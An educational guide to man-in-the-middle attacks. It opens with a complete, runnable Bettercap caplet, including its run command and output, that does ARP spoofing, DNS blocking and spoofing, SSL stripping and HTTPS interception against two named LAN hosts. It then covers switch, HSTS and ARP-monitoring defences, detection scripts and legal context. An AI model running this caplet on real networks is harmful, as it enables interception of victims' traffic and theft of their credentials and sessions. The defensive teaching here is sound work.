🔒 Man-in-the-Middle Attacks

Technical Analysis, Attack Vectors & Defense Strategies

⚠️ LEGAL NOTICE: This content is for educational purposes only. Unauthorized network attacks are illegal and punishable by law.

Introduction

A Man-in-the-Middle (MITM) attack is a cyberattack where an attacker secretly intercepts and potentially alters communications between two parties who believe they are directly communicating with each other. This comprehensive guide examines the technical mechanisms, real-world examples, and defense strategies against MITM attacks.

Key Concept: In a MITM attack, the attacker positions themselves between the victim and their intended destination (such as a website or another network device), allowing them to eavesdrop, manipulate, or block communications without either party's knowledge.

Complete MITM Attack Configuration

The following is a complete Bettercap caplet script that demonstrates a sophisticated MITM attack combining multiple techniques including ARP spoofing, DNS hijacking, SSL stripping, and traffic interception.

📄 /root/spoof.cap - Complete Bettercap Caplet
# ========================================
# NETWORK RECONNAISSANCE
# ========================================
net.probe on

# ========================================
# ARP SPOOFING CONFIGURATION
# ========================================
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.62.233,192.168.62.87
arp.spoof on

# ========================================
# SSL STRIPPING SETUP
# ========================================
set http.proxy.sslstrip true

# ========================================
# DNS BLOCKING VIA IPTABLES
# Block target 192.168.62.233 from external DNS
# ========================================
!iptables -A FORWARD -s 192.168.62.233 -p udp --dport 53 -j DROP
!iptables -A FORWARD -s 192.168.62.233 -p tcp --dport 53 -j DROP
# Block target 192.168.62.87 from external DNS
!iptables -A FORWARD -s 192.168.62.87 -p udp --dport 53 -j DROP
!iptables -A FORWARD -s 192.168.62.87 -p tcp --dport 53 -j DROP

# ========================================
# DNS SPOOFING CONFIGURATION
# ========================================
set dns.spoof.all false
set dns.spoof.address 192.168.62.156
set dns.spoof.domains zsecurity.com,*.zsecurity.com
dns.spoof on

# ========================================
# NETWORK SNIFFING
# ========================================
net.sniff on
set net.sniff.filter host 192.168.62.233 and (tcp port 80 or tcp port 443)

# ========================================
# HTTP PROXY WITH SSL STRIPPING
# ========================================
set http.proxy.sslstrip true
http.proxy on

# ========================================
# HTTPS INTERCEPTION WITH CUSTOM CERTIFICATES
# ========================================
set https.proxy.certificate ~/.bettercap-ssl/bettercap.pem
set https.proxy.key ~/.bettercap-ssl/bettercap.key
https.proxy on
Execution Command: This caplet is executed using: sudo bettercap -iface wlan0 -caplet /root/spoof.cap

Attack Architecture

Network Topology During MITM Attack

Normal Communication: Victim 1 (192.168.62.233) <-> Gateway/Router (192.168.62.1) <-> Internet

MITM Attack Scenario: Victim 1 (192.168.62.233) <-> Attacker (192.168.62.156) <-> Gateway. Victim 2 (192.168.62.87) is also compromised and its traffic likewise passes through the attacker.

Line-by-Line Attack Analysis

1. Network Reconnaissance

Network Discovery Phase
net.probe on
Purpose: Initiates network probing to discover all active hosts on the 192.168.62.0/24 subnet. This identifies potential targets and maps the network topology before launching the attack.

2. ARP Spoofing Configuration

Address Resolution Protocol Poisoning
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.62.233,192.168.62.87
arp.spoof on
Line 1: Enables full-duplex ARP spoofing, poisoning both the victims' and gateway's ARP cache simultaneously.
Line 2: Specifies two target IP addresses to intercept traffic from.
Line 3: Activates the ARP spoofing attack.
  1. To Victim: "I am the gateway (192.168.62.1), my MAC address is [attacker's MAC]"
  2. To Gateway: "I am 192.168.62.233, my MAC address is [attacker's MAC]"
  3. Result: All traffic between victim and gateway flows through attacker's machine

3. DNS Traffic Blocking

Firewall Rules for DNS Interception
# Block UDP DNS for victim 192.168.62.233
!iptables -A FORWARD -s 192.168.62.233 -p udp --dport 53 -j DROP
# Block TCP DNS for victim 192.168.62.233
!iptables -A FORWARD -s 192.168.62.233 -p tcp --dport 53 -j DROP
# Block UDP DNS for victim 192.168.62.87
!iptables -A FORWARD -s 192.168.62.87 -p udp --dport 53 -j DROP
# Block TCP DNS for victim 192.168.62.87
!iptables -A FORWARD -s 192.168.62.87 -p tcp --dport 53 -j DROP
Purpose: Blocks all DNS requests (port 53) from both targets to external DNS servers. This forces victims to accept DNS responses only from the attacker's DNS spoofer.
Note: The "!" prefix executes shell commands directly from Bettercap.

4. DNS Spoofing Setup

Malicious DNS Resolution
set dns.spoof.all false
set dns.spoof.address 192.168.62.156
set dns.spoof.domains zsecurity.com,*.zsecurity.com
dns.spoof on
Line 1: Only spoof specific domains (not all DNS queries).
Line 2: Redirect spoofed domains to attacker's IP address (192.168.62.156).
Line 3: Target zsecurity.com and all its subdomains (*.zsecurity.com).
Line 4: Enable DNS spoofing module.
DNS Spoofing Attack Flow
  1. Victim's browser requests: "What is the IP of zsecurity.com?"
  2. Request is intercepted by attacker (due to ARP spoofing)
  3. External DNS servers are blocked by iptables rules
  4. Attacker's DNS spoofer responds: "zsecurity.com = 192.168.62.156"
  5. Victim connects to attacker's malicious server instead of real website
  6. Attacker can serve phishing pages or steal credentials

5. Network Traffic Sniffing

Packet Capture Configuration
net.sniff on
set net.sniff.filter host 192.168.62.233 and (tcp port 80 or tcp port 443)
Line 1: Activates network packet sniffing.
Line 2: BPF (Berkeley Packet Filter) to capture only HTTP (port 80) and HTTPS (port 443) traffic from primary target 192.168.62.233.

6. SSL Stripping Attack

HTTPS Downgrade Attack
set http.proxy.sslstrip true
http.proxy on
Mechanism: When a victim requests an HTTP site that redirects to HTTPS, the attacker maintains an HTTPS connection to the real server but serves the victim an HTTP version, exposing all traffic in plaintext.
SSL Stripping Process: Victim <-(HTTP connection)-> Attacker (strips SSL) <-(HTTPS connection)-> Real Server
Victim sees: http://example.com (unencrypted)
Attacker reads: All passwords, cookies, and data in plaintext

7. HTTPS Interception

SSL/TLS Certificate Injection
set https.proxy.certificate ~/.bettercap-ssl/bettercap.pem
set https.proxy.key ~/.bettercap-ssl/bettercap.key
https.proxy on
Purpose: For sites that enforce HTTPS, the attacker presents a fraudulent SSL certificate. If the victim ignores certificate warnings, the attacker can decrypt HTTPS traffic.
Limitation: Modern browsers display prominent warnings for invalid certificates, making this harder to exploit.

Attack Execution Analysis

Bettercap Execution Output
sudo bettercap -iface wlan0 -caplet /root/spoof.cap
bettercap v2.33.0 (built for linux arm64 with go1.22.6) [type 'help' for a list of commands]
[14:27:44] [sys.log] [inf] gateway monitor started ...
[14:27:44] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
[14:27:44] [sys.log] [inf] net.probe probing 256 addresses on 192.168.62.0/24
[14:27:44] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
[14:27:44] [sys.log] [inf] arp.spoof arp spoofer started, probing 2 targets.
[14:27:44] [endpoint.new] endpoint 192.168.62.233 detected as d8:3a:dd:27:71:62 (Raspberry Pi Trading Ltd).
[14:27:44] [endpoint.new] endpoint 192.168.62.59 detected as 3a:e4:32:f5:98:5e.
[14:27:44] [endpoint.new] endpoint 192.168.62.3 detected as 9e:df:af:7c:52:09.

Output Interpretation

Log Entry | Meaning | Impact
gateway monitor started | Bettercap is monitoring the network gateway | Essential for routing intercepted traffic
net.probe probing 256 addresses | Scanning entire /24 subnet for active hosts | Discovers all potential targets on network
[war] full duplex spoofing | Warning about potential detection | Some routers can detect and block this attack
arp spoofer started, probing 2 targets | ARP poisoning attack is active | Traffic from both targets is being intercepted
endpoint 192.168.62.233 detected (Raspberry Pi) | Primary target identified | Confirms successful target discovery

What Can Be Captured

🔓 Unencrypted Data

HTTP passwords, form data, cookies, session tokens, API keys, email content

🍪 Session Hijacking

Authentication cookies allowing attacker to impersonate victims on websites

💳 Financial Data

Credit card numbers, banking credentials if transmitted over HTTP

📧 Email Credentials

SMTP, POP3, IMAP credentials if not using SSL/TLS

🎯 Browsing Behavior

All websites visited, search queries, online activities

📱 App Traffic

Mobile app communications that don't use certificate pinning

Complete Attack Flow Diagram

Step-by-Step MITM Attack Execution
  1. Network Reconnaissance: Execute net.probe on to discover active hosts on 192.168.62.0/24 network
  2. ARP Cache Poisoning: Send fake ARP replies to targets (192.168.62.233, 192.168.62.87) and gateway, associating attacker's MAC with their IP addresses
  3. Traffic Redirection: All network traffic between victims and gateway now flows through attacker's machine (192.168.62.156)
  4. DNS Blocking: iptables rules block victims' DNS requests to external servers (UDP/TCP port 53)
  5. DNS Spoofing: Attacker's DNS spoofer responds to queries for zsecurity.com, redirecting to 192.168.62.156
  6. SSL Stripping: HTTP proxy downgrades HTTPS connections to HTTP where possible, exposing encrypted traffic
  7. HTTPS Interception: For enforced HTTPS sites, present fraudulent certificate to decrypt traffic
  8. Packet Capture: Sniff and log all HTTP/HTTPS traffic from target 192.168.62.233
  9. Data Extraction: Parse captured packets for credentials, cookies, and sensitive information
  10. Packet Forwarding: Forward legitimate traffic to maintain connection and avoid detection

Defense Strategies Against MITM Attacks

Network-Level Defenses

Cisco Switch Configuration - Dynamic ARP Inspection
! Enable Dynamic ARP Inspection on all VLANs
Switch(config)# ip arp inspection vlan 1-100
! Validate source MAC, destination MAC, and IP addresses
Switch(config)# ip arp inspection validate src-mac dst-mac ip
! Configure trusted interfaces (uplinks only)
Switch(config)# interface GigabitEthernet0/1
Switch(config-if)# ip arp inspection trust
! Enable DHCP Snooping (required for DAI)
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan 1-100
! Configure port security on access ports (example access port; not on the trusted uplink)
Switch(config)# interface GigabitEthernet0/2
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security maximum 2
Switch(config-if)# switchport port-security violation restrict
Switch(config-if)# switchport port-security mac-address sticky

User-Level Defenses

🔐 Always Use HTTPS

Install browser extensions like HTTPS Everywhere. Never enter credentials on HTTP sites.

🔒 VPN Protection

Use trusted VPN services on public WiFi. Encrypts all traffic between your device and the VPN server, so an attacker on the local network cannot read or alter it.

⚠️ Certificate Warnings

NEVER ignore SSL certificate warnings. They indicate potential MITM attacks.

🔑 Multi-Factor Authentication

Enable MFA on all accounts. Protects even if password is intercepted.

📱 Avoid Public WiFi

Use mobile data for sensitive transactions. Public WiFi is inherently insecure.

🛡️ Security Software

Use endpoint protection that detects ARP spoofing and suspicious network activity.

Application-Level Defenses

HTTP Strict Transport Security (HSTS) Implementation
# Add HSTS header in web server configuration

# Apache
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"

# Nginx
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;

# This forces browsers to only connect via HTTPS for the max-age period
# Prevents SSL stripping on return visits; the first visit is protected only once the domain is on the browser preload list
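A small checker for the header above, written here as an added example (not code from the original page): it parses a Strict-Transport-Security value and reports where it falls short of the one-year, includeSubDomains, preload policy the configuration sets. The header strings at the bottom are constructed for comparison.

```python
"""Evaluate a Strict-Transport-Security header against the one-year, includeSubDomains,
preload policy configured above. Added example, not part of the original page."""

MIN_MAX_AGE = 31536000  # one year, the value used in the Apache/Nginx configuration above


def parse_hsts(header):
    """Split the header value into {directive_name: value}; returns None if the header is absent.

    Directive names are case-insensitive per RFC 6797, so they are lower-cased here.
    """
    if header is None:
        return None
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"') if value else True
    return directives


def evaluate_hsts(header):
    """Return a list of weaknesses; an empty list means the header matches the policy above."""
    d = parse_hsts(header)
    if d is None:
        return ["header missing: the browser never learns to refuse plain HTTP for this host"]
    problems = []
    max_age = d.get("max-age")
    if not isinstance(max_age, str) or not max_age.isdigit():
        problems.append("max-age missing or not a number: browsers ignore the whole header")
    elif int(max_age) == 0:
        problems.append("max-age=0 instructs browsers to forget the HSTS policy")
    elif int(max_age) < MIN_MAX_AGE:
        problems.append(f"max-age {max_age} is below one year ({MIN_MAX_AGE})")
    if "includesubdomains" not in d:
        problems.append("includeSubDomains missing: subdomains can still be served over plain HTTP")
    if "preload" not in d:
        problems.append("preload missing: the domain cannot be submitted to the browser preload list, so the first visit stays unprotected")
    return problems


# Constructed header values for comparison: the weak settings beside the corrected one.
WEAK_HEADER = "max-age=0"
SHORT_HEADER = "max-age=86400; includeSubDomains"
GOOD_HEADER = "max-age=31536000; includeSubDomains; preload"

if __name__ == "__main__":
    for h in (None, WEAK_HEADER, SHORT_HEADER, GOOD_HEADER):
        print(repr(h), "->", evaluate_hsts(h) or ["OK"])
```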

Detecting MITM Attacks

Signs of an Active MITM Attack

  • SSL Certificate Warnings: Browser shows warnings about invalid or untrusted certificates
  • Unexpected HTTPS Downgrade: Sites you normally access via HTTPS appear as HTTP
  • Duplicate IP/MAC Warnings: Operating system alerts about duplicate addresses on network
  • Unusual Network Latency: Sudden increase in response times or packet loss
  • Disconnection Issues: Frequent disconnections or unstable connections
  • Suspicious ARP Traffic: Excessive ARP responses detected by network monitoring tools

Detection Tools

Using arpwatch to Detect ARP Spoofing
# Install arpwatch
sudo apt-get install arpwatch
# Start arpwatch monitoring
sudo arpwatch -i eth0
# Check logs for ARP changes
sudo tail -f /var/log/syslog | grep arpwatch
# Example suspicious output:
#   flip flop 192.168.62.1 aa:bb:cc:dd:ee:ff (old MAC) new MAC: 11:22:33:44:55:66
Manual ARP Table Inspection
# View ARP cache on Linux/Mac
arp -a
# View ARP cache on Windows
arp -a
# Look for duplicate MAC addresses or unexpected changes
# Gateway MAC should never change
# Example normal output:
#   gateway (192.168.62.1) at aa:bb:cc:dd:ee:ff on eth0
# Example attack detected:
#   gateway (192.168.62.1) at 11:22:33:44:55:66 on eth0 [SUSPICIOUS!]
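The manual inspection above can be automated. The following is an added example (not code from the original page) that parses two `arp -a` snapshots, a clean baseline and a later one, and raises the two indicators the full-duplex spoof leaves behind: the gateway's MAC changing, and one MAC answering for several IPs. The snapshots use the page's addresses with constructed MAC values.

```python
"""Compare two `arp -a` snapshots and flag the ARP-poisoning indicators described above.
Added example, not part of the original page; the snapshots below are constructed."""
import re
from collections import defaultdict

# Matches Linux/macOS `arp -a` lines, e.g. "gateway (192.168.62.1) at aa:bb:cc:dd:ee:ff [ether] on eth0"
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{1,2}:){5}[0-9a-fA-F]{1,2})")


def parse_arp_table(text):
    """Return {ip: mac} for each resolved entry; '<incomplete>' entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_arp_anomalies(baseline, current, gateway_ip):
    """Compare a clean baseline with a later snapshot and return human-readable findings.
    Full-duplex spoofing makes the gateway entry and the attacker's own host share one MAC."""
    findings = []
    for ip, mac in current.items():
        if ip in baseline and baseline[ip] != mac:
            label = "gateway" if ip == gateway_ip else "host"
            findings.append(f"{label} {ip} MAC changed {baseline[ip]} -> {mac}")
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return findings


# Constructed snapshots using the page's addresses; MACs are sample values.
BASELINE_SNAPSHOT = """\
gateway (192.168.62.1) at aa:bb:cc:dd:ee:ff [ether] on eth0
? (192.168.62.87) at de:ad:be:ef:00:87 [ether] on eth0
? (192.168.62.156) at 11:22:33:44:55:66 [ether] on eth0
"""
POISONED_SNAPSHOT = """\
gateway (192.168.62.1) at 11:22:33:44:55:66 [ether] on eth0
? (192.168.62.87) at de:ad:be:ef:00:87 [ether] on eth0
? (192.168.62.156) at 11:22:33:44:55:66 [ether] on eth0
? (192.168.62.201) at <incomplete> on eth0
"""


def scan(baseline_text, current_text, gateway_ip="192.168.62.1"):
    """Parse both snapshots and return the findings list (empty when nothing changed)."""
    return find_arp_anomalies(parse_arp_table(baseline_text), parse_arp_table(current_text), gateway_ip)


if __name__ == "__main__":
    for finding in scan(BASELINE_SNAPSHOT, POISONED_SNAPSHOT) or ["no anomalies"]:
        print(finding)
```

In practice the baseline is captured once on a known-clean network and the scan is run on a schedule; a host that suddenly shares the gateway's MAC is the signature worth alerting on.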

Real-World Attack Scenarios

Scenario 1: Coffee Shop Attack

Attack Vector

Location: Public WiFi at coffee shop
Attacker Setup: Laptop running Bettercap, positioned near victims
Target: All users on the WiFi network
Method: ARP spoofing + SSL stripping + DNS hijacking

Attack Timeline:
  1. Attacker connects to coffee shop WiFi
  2. Executes caplet similar to the one analyzed
  3. Victims' banking site logins captured via SSL stripping
  4. Email credentials intercepted from HTTP connections
  5. Social media session cookies stolen for account takeover

Potential Damage: Identity theft, financial fraud, unauthorized access to multiple accounts

Scenario 2: Corporate Network Infiltration

Advanced Persistent Threat

Location: Internal corporate network
Attacker Setup: Compromised workstation or rogue employee
Target: Executives and IT administrators
Method: Targeted ARP spoofing + HTTPS interception

Attack Objectives:
  • Steal intellectual property and trade secrets
  • Capture VPN credentials for remote access
  • Intercept internal communications and emails
  • Gather information for lateral movement
  • Install additional backdoors and malware

Potential Damage: Data breach, corporate espionage, regulatory violations, millions in damages

Scenario 3: Hotel WiFi Attack

Business Traveler Targeting

Location: Hotel guest WiFi network
Attacker Setup: Raspberry Pi hidden in hotel room or common area
Target: Business travelers accessing corporate resources
Method: Automated MITM with credential harvesting

High-Value Targets:
  • Corporate VPN credentials
  • Cloud service access tokens
  • Email account credentials
  • Remote desktop connections
  • File sharing service logins

Potential Damage: Corporate network breach, data exfiltration, business email compromise

Legal and Ethical Considerations

⚖️ Legal Consequences of Unauthorized MITM Attacks

United States

  • Computer Fraud and Abuse Act (CFAA): Up to 20 years in federal prison
  • Wiretap Act: 5 years imprisonment and $250,000 fine per violation
  • Identity Theft: Additional 2-15 years if credentials are stolen
  • Economic Espionage Act: Up to 10 years for trade secret theft

European Union

  • GDPR Violations: Fines up to €20 million or 4% of global revenue
  • Computer Misuse Act: Up to 10 years imprisonment (UK)
  • Data Protection Laws: Civil and criminal penalties

Additional Consequences

  • Permanent criminal record affecting employment and travel
  • Civil lawsuits from victims for damages
  • Professional license revocation
  • Asset seizure and restitution orders
  • Supervised release and probation restrictions

Authorized Use Cases

MITM techniques may be legally used ONLY in these contexts:

1. Authorized Penetration Testing

  • Written authorization from network owner
  • Clearly defined scope and rules of engagement
  • Professional indemnity insurance
  • Proper documentation and reporting

2. Security Research

  • Isolated lab environment with owned equipment
  • No connection to production networks
  • Responsible disclosure of vulnerabilities
  • Academic or professional research purposes

3. Network Administration

  • Troubleshooting company-owned networks
  • Network monitoring with user consent
  • Security testing of internal systems
  • Legitimate business purposes only

4. Educational Purposes

  • Controlled classroom or lab environments
  • Sandboxed virtual networks
  • No real user data or systems involved
  • Supervised by qualified instructors

Conclusion

Man-in-the-Middle attacks represent one of the most serious and prevalent threats in modern cybersecurity. The analyzed Bettercap caplet demonstrates how multiple attack vectors can be combined to create a sophisticated interception system capable of compromising network security, stealing credentials, and intercepting sensitive communications.

The technical sophistication required to execute these attacks has decreased dramatically with modern tools like Bettercap, making MITM attacks accessible even to individuals with limited technical expertise. This democratization of attack capabilities makes it more critical than ever for organizations and individuals to implement robust defensive measures.

Key Takeaways

  1. Layered Defense is Essential: No single security measure is sufficient. Implement multiple layers including encryption, network segmentation, monitoring, and user education.
  2. Encryption is Fundamental: Always use HTTPS, VPNs, and encrypted protocols. SSL/TLS provides critical protection against interception.
  3. Network Infrastructure Matters: Modern switches with DAI, DHCP snooping, and port security can prevent many ARP-based attacks.
  4. User Awareness is Critical: Training users to recognize warning signs and follow security best practices is as important as technical controls.
  5. Continuous Monitoring Required: Deploy IDS/IPS systems and regularly audit network traffic for suspicious patterns.

Final Reminder: The knowledge presented in this document is intended exclusively for defensive security purposes, authorized penetration testing, and education. Understanding MITM attacks enables security professionals to better protect networks and users from these threats. Ethical behavior, respect for privacy, and adherence to legal requirements are fundamental responsibilities of everyone in the cybersecurity field.
For Security Professionals: When conducting authorized penetration tests involving MITM techniques, always maintain detailed documentation, obtain explicit written consent, clearly define scope boundaries, and provide comprehensive reports with remediation recommendations. Your professional reputation and legal protection depend on ethical conduct and proper authorization.